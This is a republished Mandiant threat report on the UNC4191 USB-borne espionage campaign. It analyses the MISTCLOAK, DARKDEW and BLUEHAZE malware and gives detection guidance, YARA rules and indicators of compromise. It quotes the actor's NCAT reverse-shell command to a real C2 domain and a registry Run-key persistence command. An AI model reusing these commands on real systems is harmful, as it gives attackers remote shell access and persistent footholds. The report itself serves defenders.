Always Another Secret: Lifting the Haze on China-nexus Espionage in Southeast Asia

逆向病毒分析 2年前 (2022) admin
455 0 0

Mandiant Managed Defense recently identified cyber espionage activity that heavily leverages USB devices as an initial infection vector and concentrates on the Philippines. Mandiant tracks this activity as UNC4191 and we assess it has a China nexus.

UNC4191 operations have affected a range of public and private sector entities primarily in Southeast Asia and extending to the U.S., Europe, and APJ; however, even when targeted organizations were based in other locations, the specific systems targeted by UNC4191 were also found to be physically located in the Philippines.

Following initial infection via USB devices, the threat actor leveraged legitimately signed binaries to side-load malware, including three new families we refer to as MISTCLOAK, DARKDEW, and BLUEHAZE. Successful compromise led to the deployment of a renamed NCAT binary and execution of a reverse shell on the victim’s system, providing backdoor access to the threat actor. The malware self-replicates by infecting new removable drives that are plugged into a compromised system, allowing the malicious payloads to propagate to additional systems and potentially collect data from air-gapped systems.

Mandiant Managed Defense performs continuous threat hunting for customers, discovering evidence of new tactics, techniques, and procedures (TTPs) that can evade traditional detection mechanisms

In response to this campaign, Mandiant deployed new real-time detections, enhancing Managed Defense’s protection for our customers from future similar activity. Our Adversary Operations team created and deployed YARA rules and Mandiant Security Validation Actions, shared at the end of the post. This blog post details our initial threat hunting discovery, the newly identified malware families, detection opportunities, and Mandiant’s assessment about the goals and motivations of the threat actor.

Malware Observed

Mandiant observed UNC4191 deploy the following malware families.

Table 1: UNC4191 Malware Families

Malware Family

Description

MISTCLOAK

MISTCLOAK is a launcher written in C++ that executes an encrypted executable payload stored in a file on disk.

BLUEHAZE

BLUEHAZE is a launcher written in C/C++ that launches a copy of NCAT to create a reverse shell to a hardcoded command and control (C2).

DARKDEW

DARKDEW is a dropper written in C++ that is capable of infecting removable drives.

NCAT

NCAT is a command-line networking utility that was written for the Nmap Project to perform a wide-variety of security and administration tasks. While NCAT may be used for legitimate purposes, threat actors may also use it to upload or download files, create backdoors or reverse shells, and tunnel traffic to evade network controls.

Initial Detection

Mandiant Managed Defense customers receive Mandiant’s dedicated proactive Threat Hunting service. Mandiant’s threat hunting team leverages the MITRE ATT&CK® framework as a guide for developing Hunt Missions that examine endpoint telemetry data, such as process events, for collection and ATT&CK technique ID tagging. The resulting threat hunting data set provides the team with wide visibility across the customer base. When performing analysis, we augment this data set with more targeted sources, like custom, real-time alerting from our customers’ endpoint detection and response (EDR) technologies.

Mandiant uses custom tooling to identify ATT&CK technique sequences and clusters associated with common threat actor behaviors. A technique sequence is useful for identifying events with a defined order of execution, such as the creation of a local account (T1136.001) and then addition to the local Administrators group (T1098). A technique cluster identifies a grouping of techniques that don’t necessarily occur in a specific order. By focusing on technique sequences and clusters, we reduce the amount of data that needs to be manually reviewed by analysts.

For example, Mandiant has observed threat actors enumerating domain trusts (T1482) and querying domain and local group permissions (T1069.001, T1069.002) within a several minute span (Figure 1). The combined event count for these three techniques occurring on their own can number in the hundreds of thousands, but by applying technique sequencing or clustering we can reduce the number of interesting events to a manageable amount.

Figure 1: Visualization of technique sequencing and clustering concepts

Mandiant identified this UNC4191 campaign by searching for anomalous sequences of events under our “Mandiant Intelligence: Staging Directories” and “Command and Scripting Interpreter: Windows Command Shell (T1059.003)” hunting missions (Figure 2).

Figure 2: Technique sequence that led to UNC4191 detection

The techniques performed by UNC4191 led to the development of additional technique sequences and detection opportunities, as described in the Detection Opportunities section.

UNC4191 Malware Infection Cycle

The overall infection cycle from this campaign can be split into three distinct phases, shown in Figure 3.

Figure 3: UNC4191 malware infection cycle

PHASE I: MISTCLOAK

The infection chain begins when a user plugs in a compromised removable device and manually executes a renamed signed binary from the root directory of the storage volume (T1091). The initial binaries—named Removable Drive.exe or USB Drive.exe—are versions of a legitimately signed application called USB Network Gate, developed by the company Electronic Team, Inc. These are used to side-load the MISTCLOAK malware that impersonates a legitimate DLL (Table 2).

Table 2: Legitimate USB Network Gate binaries used to side-load MISTCLOAK malware

MD5: f45726a9508376fdd335004fca65392a

File Name(s): D:\Removable Disk.exe, D:\USB Drive.exe

Signature Subject: Electronic Team, Inc

Product Name: USB Network Gate

Original File Name: UsbConfig.exe

MD5: 707de51327f6cae5679dee8e4e2202ba

File Name(s): D:\Removable Disk.exe, D:\USB Drive.exe

Signature Subject: Electronic Team, Inc

Product Name: USB Network Gate

Original File Name: UsbConfig.exe

The renamed USB Network Gate binaries load a MISTCLOAK DLL named u2ec.dll from the execution directory on the removable device (T1574.002) (Table 3). MISTCLOAK is a launcher for the encrypted file usb.ini, which MISTCLOAK reads from the current directory or the path autorun.inf\Protection for Autorun\System Volume Information\usb.ini. Mandiant identified the PDB file path G:\project\APT\U盘劫持\new\shellcode\Release\shellcode.pdb in the MISTCLOAK sample. Notably, the Chinese characters 盘劫持 translate to “disk hijacking”.

Table 3: MISTCLOAK malware metadata

MD5: 7753da1d7466f251b60673841a97ac5a

File Name: u2ec.dll

Compile Time: 2021-09-01T09:23:30Z

Exports: u2ec.dll

Size: 82,944

PDB filename: G:\project\APT\U盘劫持\new\u2ec\Release\u2ec.pdb (G:\project\APT\U Disk Hijacking\new\u2ec\Release\u2ec.pdb)

MISTCLOAK then opens Windows Explorer to the location on the removable device where the user files are stored with the command ‘explorer.exe  “<drive>:\autorun.inf\Protection for Autorun”’.

Phase II: DARKDEW

The file usb.ini contains an encrypted DLL payload called DARKDEW that is capable of infecting removable drives. If executed from a removable drive, DARKDEW will launch explorer.exe via `explorer.exe “<drive>:\autorun.inf\Protection for Autorun”` where <drive> is a removable drive letter, such as “E”. DARKDEW will then check if either C:\ProgramData\udisk\disk_watch.exe or   C:\ProgramData\udisk\DateCheck.exe exist and will create the directory C:\ProgramData\udisk if neither are found.

Table 4: DARKDEW malware metadata

MD5: 6900cf5937287a7ae87d90a4b4b4dec5

File Name: N/A

Compile Time: 2021-09-09T08:45:31Z

Exports: N/A

Size: 123,904

PDB filename: G:\project\APT\U盘劫持\new\shellcode\Release\shellcode.pdb

DARKDEW then proceeds to copy every file from <drive>:\autorun.inf\Protection for Autorun\System Volume Information\ to C:\ProgramData\udisk\. Mandiant identified files in this directory, such as Removable Drive (16GB).lnk, that originated from a system that was previously compromised by DARKDEW (T1074.001) and copied to a USB device. The copied data includes the files shown in Table 5 and arbitrary files with the extensions: xlsx, docx, mp4, device, jpg, pptx, pdf, txt, and lnk files.

Table 5: Files that are copied by DARKDEW from the removable drive to a compromised system

C:\ProgramData\udisk\disk_watch.exe

C:\ProgramData\udisk\libeay32.dll

C:\ProgramData\udisk\Removable Disk.exe

C:\ProgramData\udisk\rzlog4cpp.dll

C:\ProgramData\udisk\rzlog4cpp_logger.dll

C:\ProgramData\udisk\ssleay32.dll

C:\ProgramData\udisk\u2ec.dll

C:\ProgramData\udisk\USB Drive.exe

C:\ProgramData\udisk\usb.ini

C:\ProgramData\udisk\UsbConfig.exe

C:\ProgramData\udisk\wuwebv.exe

C:\ProgramData\udisk\DateCheck.exe

C:\ProgramData\udisk\example.jpg

C:\ProgramData\udisk\example.xlsx

DARKDEW will then copy the renamed USB Network Gate binary (e.g., Removable Drive.exe) to C:\ProgramData\udisk\disk_watch.exe and create persistence with a registry key value named udisk under HKCU\Software\Microsoft\Windows\CurrentVersion\Run (T1547.001). Finally, DARKDEW will launch a file named C:\ProgramData\udisk\DateCheck.exe and then exit.

Table 6: DARKDEW registry persistence

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Value: udisk

Text: c:\programdata\udisk\disk_watch.exe

If DARKDEW is executed from a non-removable drive, the behavior is slightly different. DARKDEW will create the directory C:\ProgramData\udisk\, then copy every file in the current directory of the parent executable to C:\ProgramData\udisk\. It will then copy the parent executable to C:\ProgramData\udisk\disk_watch.exe and launch it. The persistence mechanism is identical, and it will also launch C:\ProgramData\udisk\DateCheck.exe.

When DARKDEW is executed within the context of disk_watch.exe, the malware will scan the system every 10 seconds for removable drives by enumerating volumes from A to Z until it finds one that is removable. The DARKDEW malware then creates the directory <drive>\autorun.inf\Protection for Autorun\, sets its attribute to hidden, and copies the contents of the current working directory of disk_watch.exe to that directory or the subdirectory <drive>:\autorun.inf\Protection for Autorun\System Volume Information\. This capability appears to be a method for self-replication and to transfer files that may be collected from air-gapped systems.

Phase III: BLUEHAZE

The binary DateCheck.exe is a renamed version of a legitimate, signed application called Razer Chromium Render Process by Razer USA Ltd. (Table 7).

Table 7: Legitimate Razer USA Ltd. binary used to side-load BLUEHAZE malware

MD5: ea7f5b7fdb1e637e4e73f6bf43dcf090

File Name(s): DateCheck.exe

Signature Subject: Razer USA Ltd.

Product Name: Razer Chromium Render Process

Original File Name: RzCefRenderProcess.exe

The renamed Razor application, DateCheck.exe, loads the legitimate file rzlog4cpp_logger.dll, which calls the getRoot function from the BLUEHAZE malware RzLog4CPP.dll during C runtime startup (T1574.002).

Table 8: BLUEHAZE malware metadata

MD5: f632e4b9d663d69edaa8224a43b59033

File Name: RzLog4CPP.dll

Compile Time: 2021-09-09T09:27:12Z

Exports: log4cpp.dll

Size: 201,216

PDB filename: N/A

BLUEHAZE will create a new directory called C:\Users\Public\Libraries\CNNUDTV\, then it will create the registry key value ACNTV under HKCU\Software\Microsoft\Windows\CurrentVersion\Run (T1547.001) for persistence. Next, BLUEHAZE copies all the files from its working directory to C:\Users\Public\Libraries\CNNUDTV\ and then executes a renamed NCAT executable wuwebv.exe to create a reverse shell to the hard-coded command and control (C2) address: closed[.]theworkpc[.]com:80 (T1059). Mandiant has not observed evidence of reverse shell interaction; however, based on the age of the activity, this may be a result of visibility gaps or short log retention periods.

Table 9: BLUEHAZE command execution

DateCheck.exe >

“cmd.exe /C reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v ACNTV /t REG_SZ /d \”Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \”C:\\Users\\Public\\Libraries\\CNNUDTV\\DateCheck.exe\”\” /f”

cmd.exe /c copy *.* C:\\Users\\Public\\Libraries\\CNNUDTV\\”

cmd.exe /C wuwebv.exe -t -e c:\\windows\\system32\\cmd.exe closed.theworkpc[.]com 80

Outlook and Implications

Based on available data, such as PE compile timestamps for the malware involved in the aforementioned activity, this campaign potentially extends back to September 2021. Given the worming nature of the malware involved, we may have detected the later stages of this malware’s proliferation.

We believe this activity showcases Chinese operations to gain and maintain access to public and private entities for the purposes of intelligence collection related to China’s political and commercial interests. Our observations suggest that entities in the Philippines are the main target of this operation based on the number of affected systems located in this country that were identified by Mandiant.

Campaign Tracking

Mandiant will continue to monitor UNC4191’s campaign and will provide notable and dynamic updates regarding changes in tactics and techniques, the introduction of tools with new capabilities, or the use of new infrastructure to carry out their mission.

For more insights into how Mandiant tracks this and similar campaigns, see our Threat Campaigns feature within Mandiant Advantage Threat Intelligence.

Detection Opportunities

Each Mandiant threat hunting discovery is evaluated for opportunities to create new real-time detections. These detections help Mandiant identify additional activity across our customers’ environments for rapid escalation and triage analysis and aim to reduce threat actor dwell time.

Following our initial campaign discovery, we immediately searched the entire Managed Defense customer base for any activity that matched our atomic indicators of interest, including filenames, file paths, file hashes, IP addresses, domains, and other artifacts. This uncovered activity on systems at multiple customers.

Additionally, we also created or updated real-time Managed Defense detections to identify threat actor methodologies, such as:

  • Deployment or usage of NETCAT and NCAT reverse shells
  • Modification of registry Run keys for malware persistence, with arguments configured to execute the Windows binary rundll32.exe
  • Processes launched from the C:\Users\Public\Libraries\ directory

By combining Mandiant’s threat intelligence service with Managed Defense’s detection engineering and threat hunting capabilities, we can rapidly identify and provide context around malicious activity.

Detection Opportunity 

MITRE ATT&CK 

Event Details 

NCAT reverse shell execution arguments

T1059

wuwebv.exe -t -e c:\\windows\\system32\\cmd.exe closed.theworkpc[.]com 80

Parent or grandparent processes executing from Non-C:\ Drive Root

T1091, T1036

Process:

D:\USB Drive.exe

Child Processes:

> explorer.exe  “D:\autorun.inf\Protection for Autorun”

> c:\programdata\udisk\disk_watch.exe

> c:\programdata\udisk\DateCheck.exe

Grandchild Processes:

>> “cmd.exe /C reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v ACNTV /t REG_SZ /d \”Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \”C:\\Users\\Public\\Libraries\\CNNUDTV\\DateCheck.exe\”\” /f”

>> cmd.exe /c copy *.* C:\\Users\\Public\\Libraries\\CNNUDTV\\”

>> cmd.exe /C wuwebv.exe -t -e c:\\windows\\system32\\cmd.exe closed.theworkpc[.]com 80

Registry Run key persistence for binary in PROGRAMDATA

T1060

Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Value: udisk

Text: c:\programdata\udisk\disk_watch.exe

Registry Run key executing RunDLL32 command

T1218.011, T1060

reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v ACNTV /t REG_SZ /d \”Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \”C:\\Users\\Public\\Libraries\\CNNUDTV\\DateCheck.exe\”\” /f”

File name of executing process doesn’t match original name

T1036, T1574.002

OriginalFileName: UsbConfig.exe

File Name: Removable Disk.exe, USB Drive.exe

OriginalFileName: RzCefRenderProcess.exe

File Name: DateCheck.exe

Windows Explorer process execution with folder path specified on command line

T1091

Parent Process Path: D:\USB Drive.exe

Process: explorer.exe

Command Line: explorer.exe  “D:\autorun.inf\Protection for Autorun”

Mandiant Security Validation Actions

Organizations can validate their security controls using the following actions with Mandiant Security Validation.

VID

Name

 A105-454

Protected Theater – UNC4191, BLUEHAZE, Execution, Variant #1

 A105-455

Protected Theater – UNC4191, DARKDEW, Execution, Variant #1

 A105-466

Command and Control – UNC4191, DNS Query, Variant #1

YARA Rules

MISTCLOAK

rule M_Hunting_Launcher_MISTCLOAK_1 {

    meta:

        author = “Mandiant”

    strings:

        $s1 = “CheckUsbService” ascii

        $s2 = “new\\u2ec\\Release\\u2ec.pdb” ascii

        $s3 = “autorun.inf\\Protection for Autorun” ascii

    condition:

        uint16(0) == 0x5a4d and

        filesize < 200KB and

        (2 of ($s*))

}

DARKDEW

rule M_Hunting_Dropper_DARKDEW_1 {

    meta:

        author = “Mandiant”

    strings:

        $s1 = “do inroot” ascii

        $s2 = “disk_watch” ascii

        $s5 = “G:\\project\\APT\\” ascii

        $s3 = “c:\\programdata\\udisk” ascii

        $s4 = “new\\shellcode\\Release\\shellcode.pdb” ascii

    condition:

        filesize < 500KB and

        (2 of ($s*))

}

BLUEHAZE

rule M_Hunting_Launcher_BLUEHAZE_1 {

    meta:

        author = “Mandiant”

    strings:

        $s1 = “Libraries\\CNNUDTV” ascii

        $s2 = “closed.theworkpc.com” ascii

        $s3 = “cmd.exe /C wuwebv.exe -t -e” ascii

    condition:

        uint16(0) == 0x5a4d and

        filesize < 500KB and

        (2 of ($s*))

}

Indicators of Compromise

Type

Value

Description

Domain

closed.theworkpc[.]com

NCAT C2

MD5

7753da1d7466f251b60673841a97ac5a

MISTCLOAK

MD5

c10abb9f88f485d38e25bc5a0e757d1e

DARKDEW (usb.ini file)

MD5

6900cf5937287a7ae87d90a4b4b4dec5

DARKDEW (decrypted payload)

MD5

f632e4b9d663d69edaa8224a43b59033

BLUEHAZE

MD5

8ec339a89ec786b2aea556bedee679c7

NCAT

MD5

f45726a9508376fdd335004fca65392a

USB Network Gate (Legitimate Binary used for DLL Side-Loading)

MD5

707de51327f6cae5679dee8e4e2202ba

USB Network Gate (Legitimate Binary used for DLL Side-Loading)

MD5

ea7f5b7fdb1e637e4e73f6bf43dcf090

Razer Chromium Render Process (Legitimate Binary used for DLL Side-Loading)

File Path

C:\ProgramData\udisk

File and Malware Staging

File Path

C:\Users\Public\Libraries\CNNUDTV

File and Malware Staging

Acknowledgements

Special thanks to Tobias Krueger and Conor Quigley for their assistance with analyzing the MISTCLOAK, DARKDEW, and BLUEHAZE samples and Matthew Hoerger for creating Mandiant Security Validation (MSV) actions. We would also like to thank Tim Martin, Alexander Pennino, Nick Richard, and Sarah Hawley for their technical review and feedback.

 

版权声明:admin 发表于 2022年12月2日 下午7:31。
转载请注明:Always Another Secret: Lifting the Haze on China-nexus Espionage in Southeast Asia | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...